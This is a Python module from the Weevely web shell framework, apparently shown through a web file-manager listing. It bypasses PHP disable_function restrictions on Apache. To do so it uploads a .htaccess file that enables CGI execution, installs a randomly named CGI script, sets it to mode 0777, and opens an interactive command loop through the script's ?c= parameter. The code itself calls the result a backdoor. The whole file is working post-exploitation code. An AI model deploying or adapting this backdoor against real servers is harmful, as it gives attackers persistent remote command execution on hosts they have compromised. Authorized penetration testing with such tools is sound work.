Viewing file:  disablefunctionbypass.py (6.29 KB) -rwxr-xr-x
Select action/file-type:
 (+) |  (+) |  (+) | Code (+) | Session (+) |  (+) | SDB (+) |  (+) |  (+) |  (+) |  (+) |  (+) |
import os
import string
from weevely.core import messages
from weevely.core.loggers import log
from weevely.core.module import Module
from weevely.core.module import Status
from weevely.core.vectors import ModuleExec
from weevely.core.vectors import PhpCode
from weevely.utils import http
from weevely.utils import strings
class Disablefunctionbypass(Module):
"""Bypass disable_function restrictions with mod_cgi and .htaccess."""
def init(self):
self.register_info(
{
"author": [
"Emilio Pinna",
# mod_cgi + .htaccess bypassing technique by ASDIZZLE
# https://blog.asdizzle.com/index.php/2016/05/02/getting-shell-access-with-php-system-functions-disabled/
"ASDIZZLE",
],
"license": "GPLv3",
}
)
self.register_arguments(
[
{
"name": "rpath",
"help": "Remote path. If it is a folder find the first writable folder in it",
"default": ".",
"nargs": "?",
},
{"name": "-script", "help": "CGI script to upload", "default": os.path.join(self.folder, "cgi.sh")},
{"name": "-just-run", "help": "Skip install and run shell through URL"},
]
)
self.register_vectors(
[
PhpCode(
"""(is_callable('apache_get_modules')&&in_array('mod_cgi', apache_get_modules())&&print(1))||print(0);""",
postprocess=lambda x: x == "1",
name="mod_cgi",
),
ModuleExec(
"file_upload2web",
["/bogus/.htaccess", "-content", "Options +ExecCGI\nAddHandler cgi-script .${extension}"],
name="install_htaccess",
),
ModuleExec("file_upload", ["${script}", "${rpath}"], name="install_script"),
PhpCode(
"""(is_callable('chmod')&&chmod('${rpath}', 0777)&&print(1))||print(0);""",
postprocess=lambda x: True if x == "1" else False,
name="chmod",
),
ModuleExec("file_rm", ["${path}"], name="remove"),
]
)
def _clean(self, htaccess_absolute_path, script_absolute_path):
log.warning("Deleting %s and %s" % (htaccess_absolute_path, script_absolute_path))
self.vectors.get_result("remove", format_args={"path": htaccess_absolute_path})
self.vectors.get_result("remove", format_args={"path": script_absolute_path})
def _install(self):
if not self.vectors.get_result("mod_cgi"):
log.warning(messages.module_audit_disablefunctionbypass.error_mod_cgi_disabled)
return None
filename = strings.randstr(5, charset=string.ascii_lowercase).decode("utf-8")
ext = strings.randstr(3, charset=string.ascii_lowercase).decode("utf-8")
result_install_htaccess = self.vectors.get_result("install_htaccess", format_args={"extension": ext})
if not result_install_htaccess or not result_install_htaccess[0][0] or not result_install_htaccess[0][1]:
log.warning(messages.module_audit_disablefunctionbypass.error_installing_htaccess)
return None
htaccess_absolute_path = result_install_htaccess[0][0]
script_absolute_path = "%s.%s" % (htaccess_absolute_path.replace(".htaccess", filename), ext)
script_url = "%s.%s" % (result_install_htaccess[0][1].replace(".htaccess", filename), ext)
result_install_script = self.vectors.get_result(
"install_script", format_args={"script": self.args.get("script"), "rpath": script_absolute_path}
)
if not result_install_script:
log.warning(messages.module_audit_disablefunctionbypass.error_uploading_script_to_s % script_absolute_path)
self._clean(htaccess_absolute_path, script_absolute_path)
return None
result_chmod = self.vectors.get_result("chmod", format_args={"rpath": script_absolute_path})
if not result_chmod:
log.warning(messages.module_audit_disablefunctionbypass.error_changing_s_mode % script_absolute_path)
self._clean(htaccess_absolute_path, script_absolute_path)
return None
if not self._check_response(script_url):
log.warning(messages.module_audit_disablefunctionbypass.error_s_unexpected_output % (script_url))
self._clean(htaccess_absolute_path, script_absolute_path)
return None
log.warning(
messages.module_audit_disablefunctionbypass.cgi_installed_remove_s_s
% (htaccess_absolute_path, script_absolute_path)
)
log.warning(messages.module_audit_disablefunctionbypass.run_s_skip_reinstalling % (script_url))
return script_url
def _check_response(self, script_url):
script_query = "%s?c=" % (script_url)
query_random_str = strings.randstr(5).decode("utf-8")
command_query = "%secho%%20%s" % (script_query, query_random_str)
result_request = http.request(command_query).decode("utf-8")
return query_random_str in result_request
def run(self, **kwargs):
# Terminate if shell_sh is active
if self.session["shell_sh"]["status"] == Status.RUN:
log.warning(messages.module_audit_disablefunctionbypass.error_sh_commands_enabled)
return
# Install if -just-run option hasn't been provided, else directly check the backdoor
script_url = self.args.get("just_run")
if not script_url:
script_url = self._install()
if not script_url:
return
elif not self._check_response(script_url):
log.warning(messages.module_audit_disablefunctionbypass.error_s_unexpected_output % (script_url))
return
log.warning(messages.module_audit_disablefunctionbypass.requests_not_obfuscated)
# Console loop
while True:
query = input("CGI shell replacement $ ").strip().replace(" ", "%20")
if not query:
continue
if query == "quit":
break
log.info(http.request("%s?c=%s" % (script_url, query)).decode())
|